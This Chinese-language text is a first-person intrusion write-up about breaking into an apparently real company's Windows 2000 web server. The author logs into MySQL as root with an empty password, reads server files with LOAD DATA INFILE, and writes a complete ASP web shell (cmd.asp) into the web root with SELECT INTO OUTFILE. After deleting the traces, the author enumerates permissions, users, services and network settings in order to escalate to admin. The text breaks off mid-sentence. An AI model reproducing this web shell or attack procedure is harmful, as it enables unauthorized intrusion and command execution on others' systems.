Ok!先用nmap扫描一下,扫描结果如下:
25/tcp open smtp
53/tcp open domain
80/tcp open http
110/tcp open pop-3
389/tcp open ldap
1002/tcp open unknown
3306/tcp open mysql
然后从IIS版本判断目标是windows 2000服务器。从开放的端口来看,它要么是安装了防火墙,要么是做了TCP/IP过滤,呵呵,比abc.target.net有意思多了。从25和110端口返回的数据来看,他们用的邮件服务器是IMail 6.04,没什么可利用的。IIS上面网管做了安全配置,一些默认的CGI漏洞也没有,这也没什么好利用的。只剩下最后一个端口了,习惯性的用我的mysql客户端连接试试:
F:\cmd〉mysql -u root -h www.target.net
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 3038 to server version: 3.23.21-beta
Type ’help;’ or ’\h’ for help. Type ’\c’ to clear the buffer
mysql〉
呵呵,不好意思,看来网管没有给mysql帐号root设置一个密码,是默认的空密码,那么我们就可以利用这个漏洞来做点什么了。如果是MS-SQL数据库的话就好办啦,直接可以用xp_cmdshell来运行系统命令,但是可惜的是mysql没有类似MS-SQL那样的扩展存储过程。
现在我们可以利用这个漏洞来做三件事情:
〈1〉搜索mysql数据库里面的内容,看能不能找出一些有用的敏感信息,我找了一会儿就不想找了,呵呵
〈2〉读取服务器上的任何文件,当然前提是知道文件的物理路径
〈3〉以启动mysql服务用户的权限往服务器上写文件,前提是这个文件要不存在的,就是说不能覆盖文件
如果我们知道IIS主目录的物理路径的话,我们就可以往上面写一个ASP上去,然后通过IE来执行系统命令。怎么得到IIS目录的物理路径呢?天知道!
没办法,猜吧。。。。。。先在mysql默认数据库test中建一个表tmp,这个表只有一个字段str,类型为TEXT,
mysql〉 use test;create table tmp(str TEXT);
Database changed
Query OK, 0 rows affected (0.05 sec)
然后凭着自己做网管的直觉,开始猜测IIS主目录的物理路径,c:\inetpub\wwwroot,c:\www,c:\wwwroot,c:\inetpub\web,d:\web,d:\wwwroot,都不对,55555。大概猜测到第10次,我的mysql客户端回显信息如下:
mysql〉 load data infile ""d:\\www\\gb\\about\\about.htm"" into table tmp;
Query OK, 235 rows affected (0.05 sec)
Records: 235 Deleted: 0 Skipped: 0 Warnings: 0
哈哈哈,猜中了,IIS主目录的物理路径是d:\www,因为上面的文件的虚拟路径是http://www.target.net/gb/about/about.htm,看来我得到一个shell了,呵呵。
接下来我们就可以往d:\www\gb\about里面写一个ASP文件进去,然后通过http://www.target.net/gb/about/cmd.asp来执行系统命令了。然后在网上找来一个现成的cmd.asp,懒的自己去写了:)。Cmd.asp如下:
-------------------------------cmd.asp----------------------------------------
〈% Dim oScript
Dim oScriptNet
Dim oFileSys, oFile
Dim szCMD, szTempFile
On Error Resume Next
Set oScript = Server.CreateObject(""""WSCRIPT.SHELL"""")
Set oScriptNet = Server.CreateObject(""""WSCRIPT.NETWORK"""")
Set oFileSys = Server.CreateObject(""""Scripting.FileSystemObject"""")
szCMD = Request.Form("""".CMD"""")
If (szCMD 〈〉 """""""") Then
szTempFile = """"C:\"" & oFileSys.GetTempName()
Call oScript.Run (""""cmd.exe /c """" & szCMD & """" 〉 """" & szTempFile, 0, True)
Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0)
End If %〉
〈HTML〉〈BODY〉〈FORM action=""""〈%= Request.ServerVariables(""""URL"""") %〉"""" method=""""POST""""〉
〈input type=text name="""".CMD"""" size=45 value=""""〈%= szCMD %〉""""〉〈input type=submit value=""""Run""""〉〈/FORM〉〈PRE〉
〈% If (IsObject(oFile)) Then
On Error Resume Next
Response.Write Server.HTMLEncode(oFile.ReadAll)
oFile.Close
Call oFileSys.DeleteFile(szTempFile, True)
End If%〉
〈/BODY〉〈/HTML〉
----------------------------end of cmd.asp-----------------------------------
由于往mysql数据库中插入数据的时候,会过滤特殊字符什么的,例如双引号之类的,特别麻烦。各位留意没有,上面的ASP语句中,都是两个双引号一起的,这样才能写进去,原来是一个双引号的。然后我在数据库中再建一个表:
mysql〉 use test;create table cmd(str TEXT);
Database changed
Query OK, 0 rows affected (0.05 sec)
然后用如下语句,一句一句把上面的ASP写进去:
mysql〉 insert into cmd values(""一行一行的asp代码,呵呵"");
为什么不全部一起写进去呢?呵呵,换行后,一会儿导出的文件就会有特殊字符了,asp就不能正常运行了,只能辛苦点一行一行写了。然后把asp文件导到服务器上:
mysql〉select * from cmd into outfile ""d:\\www\\gb\\abou\\cmd.asp"";
然后把我们刚才建的表都删除掉:
mysql〉 use test; drop table tmp; drop table cmd;
ok!我们得到一个shell了,虽然权限不高,但毕竟已经向取得admin权限迈出一大步了,不是吗,呵呵。做这个asp文件可花了我不少时间哦。现在我们利用这个shell来收集系统信息,尝试取得admin权限。
〈1〉先看一下系统文件权限设置如何:
c:\ Everyone:(OI)(CI)F
d:\ \xxx:(OI)(CI)(DENY)(特殊访问:)
DELETE
READ_CONTROL
WRITE_DAC
WRITE_OWNER
STANDARD_RIGHTS_REQUIRED
FILE_READ_DATA
FILE_WRITE_DATA
FILE_APPEND_DATA
FILE_READ_EA
FILE_WRITE_EA
FILE_EXECUTE
FILE_DELETE_CHILD
FILE_READ_ATTRIBUTES
FILE_WRITE_ATTRIBUTES
Everyone:(OI)(CI)F
看来我们现在就可以读写硬盘上的任何文件了,现在就可以改他的首页了,但这样做没意思,对不对,我们的目标是取得admin权限,呵呵。
〈2〉然后搜索一下硬盘上都有些什么文件:
c:\Program Files 的目录下有两个比较有意思的文件,
2000-12-19 13:10
Serv-U
2001-01-20 22:43 绿色警戒
把Serv-U里面的用户和密码读出来看看后,没有什么用处,然后进入绿色警戒目录看看,呵呵,除了log外,什么都没有,呵呵。
〈3〉再看看都有哪些用户:
Guest IUSR_SERVER_1 IUSR_SERVER-2
IWAM_SERVER_1 IWAM_SERVER-2 ceo[他们CEO的帐号J]
TsInternetUser
管理员有ceo 和target\Domain Admins,看来这台机器是他们域中的一台服务器。开始本来想给ceo下一个套,在他的启动目录里放一个程序,但后来看到这个帐号已经几个月没登陆了,就放弃了。
〈4〉看看启动了那些服务,这几个比较有意思, 看来都是默认的:
Task Scheduler
Simple Mail Transport Protocol (SMTP)
Task Scheduler
〈5〉看看网络状况,这几个比较有意思:
TCP 0.0.0.0:21 0.0.0.0:0 LISTENING
TCP 0.0.0.0:119 0.0.0.0:0 LISTENING
TCP 192.168.1.3:3389 0.0.0.0:0 LISTENING
看来有TermService,不过在网卡上做了TCP/IP过滤,只对内网开放,那么我们就来
〈6〉看看网卡设置信息:
Ethernet adapter 本地连接:
Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : Realtek RTL8139(A) PCI Fast Ethernet Adapter
Physical Address. . . . . . . . . : 00-E0-4C-68-C4-B2
DHCP Enabled. . . . . . . . . . . : No
IP Address. . . . . . . . . . . . : 192.168.1.3
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . :
DNS Servers . . . . . . . . . . . :
Ethernet adapter 本地连接 2:
Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : Realtek RTL8139(A) PCI Fast Ethernet Adapter#2
Physical Address. . . . . . . . . : 00-E0-4C-68-B8-FC
DHCP Enabled. . . . . . . . . . . : No
IP Address. . . . . . . . . . . . :xxx
Subnet Mask . . . . . . . . . . . :
Default Gateway . . . . . . . . . :
经过上面的一些步骤,对这台服务器的设置情况就有了一个大概
